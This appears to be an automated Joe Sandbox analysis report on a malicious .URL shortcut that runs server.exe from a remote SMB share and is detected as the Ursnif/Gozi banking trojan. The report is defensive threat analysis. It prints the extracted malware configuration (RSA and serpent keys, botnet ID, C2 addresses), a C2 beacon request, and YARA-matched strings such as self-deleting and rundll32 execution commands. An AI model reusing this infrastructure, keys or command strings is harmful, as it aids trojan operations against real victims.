Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
marzo.txt.url

Overview

General Information

Sample Name:marzo.txt.url
Analysis ID:826967
MD5:d8dc17b22192b297073d5749a7b49966
SHA1:606fd516fb85a0fbaa3a2b7ea92feffd5ae41b99
SHA256:f7b7f524138f10ad3b0d8145997db4ee5c90e7d8f76281cfc4a32bc427833236
Infos:

Detection

Ursnif
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Found malicious URL file
Writes registry values via WMI
Opens network shares
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Creates a window with clipboard capturing capabilities
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6104 cmdline: "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail MD5: CA3FDE8329DE07C95897DB0D828545CD)
  • server.exe (PID: 6612 cmdline: "\\46.8.19.120\Agenzia\server.exe" MD5: C29870BA33B8691967B100BC30572BB7)
  • server.exe (PID: 6832 cmdline: "\\46.8.19.120\Agenzia\server.exe" MD5: C29870BA33B8691967B100BC30572BB7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
marzo.txt.urlMethodology_Suspicious_Shortcut_SMB_URLDetects remote SMB path for .URL persistence@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x35:$file: URL=file://4
  • 0x8a:$url_clsid: [{000214A0-0000-0000-C000-000000000046}]
  • 0x0:$url_explicit: [InternetShortcut]
SourceRuleDescriptionAuthorStrings
00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1238:$a1: /C ping localhost -n %u && del "%s"
    • 0xeb8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf10:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xaac:$a5: filename="%.4u.%lu"
    • 0x64a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x886:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbc7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe7d:$a9: &whoami=%s
    • 0xe66:$a10: %u.%u_%u_%u_x%u
    • 0xd73:$a11: size=%u&hash=0x%08x
    • 0xb2d:$a12: &uptime=%u
    • 0x70b:$a13: %systemroot%\system32\c_1252.nls
    • 0x12a8:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb64:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x64a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa78:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xd02:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xda6:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
    00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0x1238:$a1: /C ping localhost -n %u && del "%s"
      • 0xeb8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xf10:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xaac:$a5: filename="%.4u.%lu"
      • 0x64a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x886:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xbc7:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe7d:$a9: &whoami=%s
      • 0xe66:$a10: %u.%u_%u_%u_x%u
      • 0xd73:$a11: size=%u&hash=0x%08x
      • 0xb2d:$a12: &uptime=%u
      • 0x70b:$a13: %systemroot%\system32\c_1252.nls
      • 0x12a8:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 13 entries
      No Sigma rule has matched
      Timestamp:192.168.2.35.44.43.1749733802033203 03/15/23-12:33:08.360785
      SID:2033203
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.35.44.43.1749733802033204 03/15/23-12:33:08.360785
      SID:2033204
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results
      Source: 00000003.00000003.1591519881.0000000002B70000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 3_2_02B81508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_02B81508
      Source: \Device\Mup\46.8.19.120\Agenzia\server.exeCode function: 5_2_02BE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,5_2_02BE1508

      Networking

      barindex
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 5.44.43.17:80
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 5.44.43.17:80
      Source: Joe Sandbox ViewASN Name: MGNHOST-ASRU MGNHOST-ASRU
      Source: Joe Sandbox ViewIP Address: 192.229.221.95 192.229.221.95
      Source: global trafficHTTP traffic detected: GET /drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8VWt8GQ/Zc6hXPYvHVnVEinmxGwG/FbxcbjsVVBkkkF087h8/0Bw_2FBX6oYzh4Vz7I7V6u/xxtFlXc0f1lZa/ReLwGc75/TgOyVXs_2BG_2Ff5dq8IUPJ/_2B5Dzbadz/pCrKzEKZvmMD7pEh0/5p7osKVJqMAc/da4zdGlXLsX/CQJtG1bn92QsJL/_2BNPELQUnUqT0_2B_2B2/nFFFAPeD9EV0WvEI/yBuQ4L9zF/_2Bt.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache
      Source: unknownDNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/
      Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/b2c5-fe065076e0a1
      Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8
      Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/~
      Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/XaKJ910OZ6OkzOiEp1j_2/BGdUIBHp_2FM8Z2X/fEGunvRWGFrRGJ9/FM827N5CFAo37
      Source: server.exe, 00000005.00000002.2850719337.0000000002CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/p8a6EJ5vt4U/NrIUl_2BZrXy6_/2BoMtuVkg7FYSQnXs7vFZ/T_2BtMhNb_2F_2Bq/Vr
      Source: unknownDNS traffic detected: queries for: checklist.skype.com
      Source: global trafficHTTP traffic detected: GET /drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8VWt8GQ/Zc6hXPYvHVnVEinmxGwG/FbxcbjsVVBkkkF087h8/0Bw_2FBX6oYzh4Vz7I7V6u/xxtFlXc0f1lZa/ReLwGc75/TgOyVXs_2BG_2Ff5dq8IUPJ/_2B5Dzbadz/pCrKzEKZvmMD7pEh0/5p7osKVJqMAc/da4zdGlXLsX/CQJtG1bn92QsJL/_2BNPELQUnUqT0_2B_2B2/nFFFAPeD9EV0WvEI/yBuQ4L9zF/_2Bt.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      bar